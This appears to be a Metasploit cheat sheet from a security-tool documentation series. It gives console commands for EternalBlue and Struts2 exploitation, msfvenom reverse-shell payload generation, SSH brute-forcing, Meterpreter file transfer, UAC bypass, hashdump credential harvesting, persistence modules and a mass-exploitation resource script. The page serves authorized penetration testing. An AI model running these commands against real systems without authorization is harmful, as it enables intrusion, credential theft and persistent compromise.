Metasploit - Penetration Testing Framework

Metasploit is a computer security framework that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It's one of the most popular penetration testing tools and includes a suite of tools for developing and executing exploit code against remote targets.

🎯 Purpose

• Vulnerability Validation: Test if systems are vulnerable to specific exploits
• Penetration Testing: Conduct authorized security assessments
• Exploit Development: Create and test custom exploits
• Security Research: Study vulnerabilities and attack techniques

🚀 Basic Usage

Starting Metasploit

# Start Metasploit console
msfconsole

# Start with specific database
msfconsole -q

# Load specific resource script
msfconsole -r script.rc

Basic Commands

# Search for exploits
search type:exploit platform:windows

# Use an exploit
use exploit/windows/smb/ms17_010_eternalblue

# Show exploit options
show options

# Set target
set RHOSTS 192.168.1.100

# Run the exploit
exploit

🔧 Core Commands

Information Gathering

# Search exploits
search ms17-010
search type:exploit platform:linux
search cve:2021

# Get exploit information
info exploit/windows/smb/ms17_010_eternalblue

# Show available targets
show targets

# Show available payloads
show payloads

Exploit Configuration

# Set required options
set RHOSTS 192.168.1.0/24
set RHOST 192.168.1.100
set LHOST 192.168.1.10
set LPORT 4444

# Show current settings
show options

# Check if target is vulnerable
check

Payload Management

# Set payload
set payload windows/meterpreter/reverse_tcp

# Generate standalone payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > shell.exe

# Show payload options
show advanced

🎯 Common Attack Scenarios

Windows Exploitation

# MS17-010 EternalBlue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit

# SMB relay attack
use exploit/windows/smb/smb_relay
set SMBHOST 192.168.1.100
exploit

Linux Exploitation

# SSH authentication
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.0/24
set USERNAME root
set PASS_FILE /usr/share/wordlists/passwords.txt
run

# Web application attacks
use exploit/multi/http/struts2_content_type_ognl
set RHOSTS 192.168.1.100
set TARGETURI /struts2-app/
exploit

Web Application Testing

# Directory traversal
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.100
run

# SQL injection testing
use auxiliary/scanner/http/sqlmap
set RHOSTS 192.168.1.100
set TARGETURI /login.php
run

📁 Installation

Debian/Ubuntu

# Install from repository
sudo apt update
sudo apt install metasploit-framework

# Initialize database
sudo msfdb init

From Source

# Install dependencies
sudo apt install git ruby-dev build-essential

# Clone repository
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
gem install bundler
bundle install

Kali Linux

# Pre-installed, just update
sudo apt update && sudo apt upgrade metasploit-framework

⚙️ Database Management

Database Operations

# Check database status
db_status

# Connect to database
db_connect

# Create workspace
workspace -a target_company

# List workspaces
workspace

# Import scan results
db_import nmap_scan.xml

Host and Service Management

# List discovered hosts
hosts

# List discovered services
services

# Add host manually
hosts -a 192.168.1.100 -o Windows

# Search for specific services
services -p 445

💡 Meterpreter Commands

Basic Meterpreter

# Get system information
sysinfo

# Get current user
getuid

# List processes
ps

# Migrate to another process
migrate 1234

# Get shell
shell

File System Operations

# Change directory
cd C:\Windows

# List directory
ls

# Download file
download C:\Windows\System32\drivers\etc\hosts

# Upload file
upload payload.exe C:\temp\

# Search for files
search -f *.txt

Privilege Escalation

# Get system privileges
getsystem

# Load privilege escalation module
use priv

# Bypass UAC
use exploit/windows/local/bypassuac_injection

🔧 Advanced Features

Post-Exploitation Modules

# Harvest credentials
use post/windows/gather/hashdump
use post/windows/gather/credentials/windows_autologin

# Gather system information
use post/windows/gather/enum_system
use post/linux/gather/enum_system

# Persistence
use exploit/windows/local/persistence
use exploit/linux/local/cron_persistence

Auxiliary Modules

# Port scanning
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
run

# SMB enumeration
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run

# SNMP scanning
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 192.168.1.0/24
run

Resource Scripts

Create automation scripts:

# resource_script.rc
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS file:/tmp/targets.txt
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set ExitOnSession false
exploit -j

🚨 Important Notes

• Legal Authorization: Only use on systems you own or have explicit permission to test
• Responsible Disclosure: Report vulnerabilities through proper channels
• Environmental Impact: Some exploits may cause system instability
• Detection: Modern security solutions may detect Metasploit signatures
• Updates: Keep framework updated for latest exploits and fixes

📊 Best Practices

• Scope Definition: Clearly define testing boundaries
• Documentation: Keep detailed logs of all activities
• Cleanup: Remove artifacts after testing
• Reporting: Provide clear, actionable reports
• Training: Continuous learning and skill development

---

Part of the HackerHub.me tool documentation series